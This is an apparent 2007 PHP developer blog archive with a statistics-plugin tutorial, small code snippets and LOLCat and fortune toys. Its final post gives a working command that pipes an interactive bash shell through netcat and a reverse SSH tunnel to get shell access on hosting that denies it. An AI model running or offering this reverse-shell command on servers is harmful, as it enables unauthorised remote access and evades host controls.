Archive for the ‘PHP’ Category

Obsessive Web Statistics (OWS) analysis plugin tutorial

Saturday, September 1st, 2007

This is a short tutorial on how you can write an analysis plugin for Obsessive Website Statistics (OWS). OWS is designed first and foremost to be plugin friendly, and as you will see, adding useful functionality in the form of plugins is not hard at all, and can be done in just a few lines of code. We are going to add DNS hostname resolving to OWS.

What is an analysis plugin?

An analysis plugin performs analysis on the parsed logfile data, and stores that information in the database dimensions. OWS has wrapped all of this stuff in a nice easy to use abstraction layer so that you won’t need to make actual SQL queries if you don’t want to.

Implementation

All OWS plugins are implemented as PHP classes. This is the bare skeleton that all OWS plugins should define.

class OWSDNS implements iPlugin{

	// this should return a unique ID identifying the plugin, should start with an alpha,
	// should use basename instead of just __FILE__ otherwise it could expose path information
	public function getPluginId();//{
		return 'p'. md5(basename(__FILE__) . get_class());
	}

	// returns an associative array describing the plugin
	public function getPluginInformation(){

		return array(

			'pluginName' => 'Name of plugin',
			'aboutUrl' => 'http://information.about.plugin',

			'author' => 'author',
			'url' => 'http://developers.website',

			'description' => 'Description of what plugin does'
		);
	}
}

You should notice we define two functions — getPluginId() and getPluginInformation(). These must be defined by any OWS plugin, and are used to identify the plugin in a number of instances. This plugin also implements iPlugin. All interfaces are defined (with plenty of comments) in include/plugin_interfaces.inc.php. A plugin can implement as many interfaces as it needs to. There are a few types, but the one we are going to implement is iAnalysisPlugin. We will do so by changing the first part to:

class OWSDNS implements iPlugin, iAnalysisPlugin {

Additionally, we need to register the plugin with OWS so that it knows what kind of plugin you are defining. Add this to the end of your source file:

register_plugin('analysis',new OWSDNS());

An analysis plugin needs to implement the following functions:

define_dimensions
InitializeAnalysis
preAnalysis
getPrimaryNode
getAttributes
postAnalysis

All of these functions are documented in include/plugin_interfaces.inc.php if you need more comprehensive information.

Now, OWS stores data in multiple dimensions. Each dimension has a ‘primary node’ which is the main data element of the dimension. Each primary node can have mutliple attributes which are defined about it, and always has the same name as the dimension. Plugins can define new dimensions or extend existing dimensions.

Right now, OWS stores only the host address — which is an IP address representing the visitor. What our plugin needs to do is resolve this address, and store it as an attribute of the dimension. So, we need to extend the dimension ‘host’, which we can do using the function define_dimensions().

// this function should return a set of arrays that define the dimensions
// and attributes that this plugin defines. You should not specify an attribute
// that another plugin defines. This is not website dependent.
public function define_dimensions(){

	return array(
		'host' => array(
			'hostname' => attribute_defn('varchar',254,16)
		)
	);
}

Pretty simple, eh? See, the array returned means that we are defining inside dimension ‘host’, an attribute named ‘hostname’. The function attribute_defn is used to define the SQL type that our attribute has, so the installer can create it for us. Now, we can write the actual analysis part.

At the beginning of analysis, the function InitializeAnalysis is called in case the plugin needs to do something before the analysis begins. This function is called once per website analyzed. Our plugin isn’t going to need this, so we just return true.

public function InitializeAnalysis($website){
	return true;
}

Now, after all plugins are initialized, then the logfile lines are read from the logfile (or from the database in the case of an install or in the case of reanalysis). It is read in phases, which consist of 4 steps:

preAnalysis
getPrimaryNode
getAttributes
postAnalysis

Now, preAnalysis and postAnalysis are only called once per phase, but getPrimaryNode is typically called at least once per logfile line. Our plugin doesn’t use getPrimaryNode — getPrimaryNode is only used for plugins that define new dimensions in define_dimensions. If you don’t define a primary node, then you should return false and show an error.

It should also be noted that our plugin doesn’t need to do any preAnalysis or postAnalysis, so we can just return true.

public function preAnalysis($website,&$ids){
	return true;
}

public function getPrimaryNode($website, $dimension, $line){
	return show_error("Invalid dimension passed to plugin\"" . get_class() . "\"");
}

public function postAnalysis($website,&$ids){
	return true;
}

Now we get to the part that actually does the work. The function getAttributes needs to return an array representing the attributes that the plugin defines per dimension. The $dimension argument is passed in to the function, and we should only do analysis on the primary node. The contents of the primary node are passed in to the function as well. This makes sense, because attributes of the primary node should be discernable by only looking at the primary node itself. If this is not the case, then you should probably be defining a new dimension instead.

This function should return an array of attributes/values in the form of:

	array('attribute' => 'value', ...)

Note: The returned values can be cached (for performance reasons), so this function may NOT always be called for each row. You should ALWAYS return an array with the same keys each time, in the same order that you defined them in define_dimensions. Of course, if you do not define any attributes in the dimension passed in the $dimension parameter, or if there is an error, then return false.

Anyways, heres the code for this function:


public function getAttributes($website, $dimension, $pnode){

	if ($dimension != 'host')
		return show_error("Invalid dimension passed to plugin\"" . get_class() . "\" in getAttributes!");

	// return the hostname
	return array('hostname' => gethostbyaddr($pnode));

}

And thats it! Wasn’t that easy? Of course, theres a lot more useful things we could probably implement, and make this more polished. Now, after you install the plugin and run the analysis, the only filter you’ll be able to use on your new dimension attribute in the web interface is the manual analysis, since it allows analysis on all defined dimensions. But, it would be a pretty trivial matter to either modify an existing filter plugin or create a new filter plugin. We’ll discuss this in the future.

Hope this helps you out. If you need help with OWS, or developing for OWS, don’t hesitate to ask! Leave your comments, or join the obsessive-compulsive mailing list!

Download this
Obsessive Website Statistics Website

Web Interface to the fortune program

Sunday, August 26th, 2007

I got bored last night, so I created a wrapper around the fortune program on my Gentoo box… then made it better with jQuery AJAX goodness. And then I combined it with my rndsay wrapper to make the fortunes be echoed by cows. πŸ™‚ Of course, getting it to work on my host here has been annoying, but I finally got it working! Enjoy!

Random Fortune Generator

Source Code

PHP Snippet: Padded table on CLI

Thursday, August 2nd, 2007

While working on OWS, I created this neat little code snippet, which while it only took a few minutes to code, could be useful for someone just looking for a routine to display a simplistic table on the command line in PHP. Heres the code:

/*
	Pass this function an array of stuff and it displays a simple padded table. No borders.
*/
function show_console_table($rows, $prepend = '', $header = true){

	$max = array();

	// find max first
	foreach ($rows as $r)
		for ($i = 0;$i < count($r);$i++)
			$max[$i] = max(array_key_exists($i,$max) ? $max[$i] : 0 ,strlen($r[$i]));

	// add a header?
	if ($header){

		// remove the first element
		$row = array_shift($rows);

		echo "$prepend";
		for ($i = 0;$i < count($row);$i++)
			echo str_pad($row[$i],$max[$i]) . "  ";
		echo "\\n$prepend" . str_repeat('=',array_sum($max) + count($max)*2) . "\\n";

	}

	foreach($rows as $row){
		echo "$prepend";
		for ($i = 0;$i < count($row);$i++)
			echo str_pad($row[$i],$max[$i]) . "  ";
		echo "\\n";
	}
}

Like I said, pretty simple, but quite useful too. Just pass the function an array, and it outputs a space-padded table with an optional header. Its probably been done already, but thats my implementation. πŸ™‚

Obsessive Web Statistics: Open Source Web 2.0 Website Statistics System

Wednesday, July 18th, 2007

For the last month or so, I’ve been working on a new PHP/MySQL/jQuery web application that I’ve decided to call “Obsessive Web Statistics” (OWS). A project has been created on Sourceforge for it, and I’m happy to finally announce the first file release for OWS! There are a number of features about OWS that give it an advantage over existing website statistics software.

Instead of generating static HTML reports like most website statistics programs, OWS takes your Apache logfiles and puts them into a MySQL database. A dynamic jQuery driven interface with a PHP backend allows you to manipulate the data and display it in useful ways. The interface is mostly intuitive and simple to use while providing powerful options to manipulate the data. For more information, you can visit the Sourceforge page or subscribe to the obsessive-compulsive mailing list (how crazy of a name is that? LoL. FYI: Its only about development and help for OWS) . Archived version of the list is available at Sourceforge as well.

Links:

Sourceforge website: http://obsessive.sourceforge.netΒ 

Demo Site: http://ows.mattas.net/Β 

Many thanks to my friend Tony Mattas (http://www.mattas.net) for providing hosting for the OWS demo site!

A lesson well learned: Don’t seek() on STDIN

Wednesday, July 18th, 2007

The neat thing about fread() and friends in most languages is that you can open up STDIN and pretend its a file. However, the following code doesn’t work.. hehe.

<?php
	$file = $argv[1];

	if ($file != '-' && !file_exists($file))
		die("File $file does not exist, foo!\n");
	if ($file == '-')
		$file = 'php://stdin';

	$f = fopen($file,'r');

	// crazy code in here

	// ok, go backwards
	fseek($f, $some_position);

	// Heh, it doesn't always work!?

?>

Yeah, I know it seems to be quite obvious from this small snippet, but for the record the lines were specified by quite a few lines of code and I didn’t quite realize that I was doing that… lol.

LOLCat Creator Generator

Friday, July 6th, 2007

For those of you who have used my LOLCat Generator script, you would be happy to know that I’ve improved it slightly — now using it on images that have white backgrounds works decently. Things the LOLCat Creator can do:

  • Put a caption in any of the corners, with wordwrap
  • Generate from any one of the few random cat pictures I have on the site
  • Generate from any URL of an image that you give it

A lot of people have been using it, and there are some pretty amusing pictures that have been generated. I’ll have to post the best ones. πŸ™‚

LOLCat Generator Page

LOLCat Generator in PHP

Friday, June 29th, 2007

Last night I had a discussion with my roommate and decided that it would be pretty trivial to make a php script that generated LOLCats, since everyone else was doing it. Of course, as far as I know there are no free LOLCat generator scripts, so without further ado, I present to you my open source LOLCat generator script. It includes a demo page to show how its supposed to work. There are a number of parameters you can adjust… its intended to be used as a library. You can download it from my software page.

LOLCats Generator page

Download Page: http://www.virtualroadside.com/download/lolcats-0.1.zip

LOLCat

Let me know if you find any bugs. πŸ™‚

How to get remote SSH shell access on some servers running PHP

Saturday, June 2nd, 2007

I was trying to do an XML dump with MediaWiki for a friend, and the tools MediaWiki provides to do it requires shell access — which my friend does not have in his hosting package. So I tried using phpshell, but got annoyed that it would freeze anytime I executed something that required user input. After much thought, I devised a way to create an SSH shell using PHP (sorta) that I could use. Heres how you can do it too.

The Concept:

PHP can (usually) execute arbitrary executable files on the server that it resides on. If the executable forks, then it can open other programs or connect to remote resources, without hanging the PHP connection. I’ve written a program that does this, and executes a statement that connects to a remote SSH server, creates a tunnel to it, and opens a shell on that tunnel so that a user on the remote SSH server can connect to that port and use the shell. The statement looks like this:

netcat -l -p 20000 -s 127.0.0.1 -e "/bin/bash -i" | ssh -NR 20001:localhost:20000 username@hostname -o "StrictHostKeyChecking false" -i key_file_name

You can connect to this shell by doing a

netcat localhost 20001

on the remote SSH server. You need to setup an SSH key on both servers so that the authentication doesn’t ask you for a password at all (see below). Of course, if those programs don’t exist on the remote server then this wont work (however, I have included a compiled version of gnu-netcat with the program that you can use).

The Usage:

This code works, but is still mostly a ‘proof of concept’.

Requirements:

  • You must be able to upload files to the server and ensure they are executable (though, the software tries to set the executable bits if it is not the case)
  • You must be either able to compile files in a executable format that the server can execute, or you must be able to compile files on the server itself (in which case, you probably don’t need this program!).
  • The user that the webserver (or the php CGI script) is running as must be able to write to a file
  • You need an accessible SSH server setup somewhere that you can add user accounts to
  • Forwarding must be enabled (default: yes)
  • Public key authentication must be enabled (default: yes)
  • It needs to have netcat installed
  • I used Linux to set this up

(more…)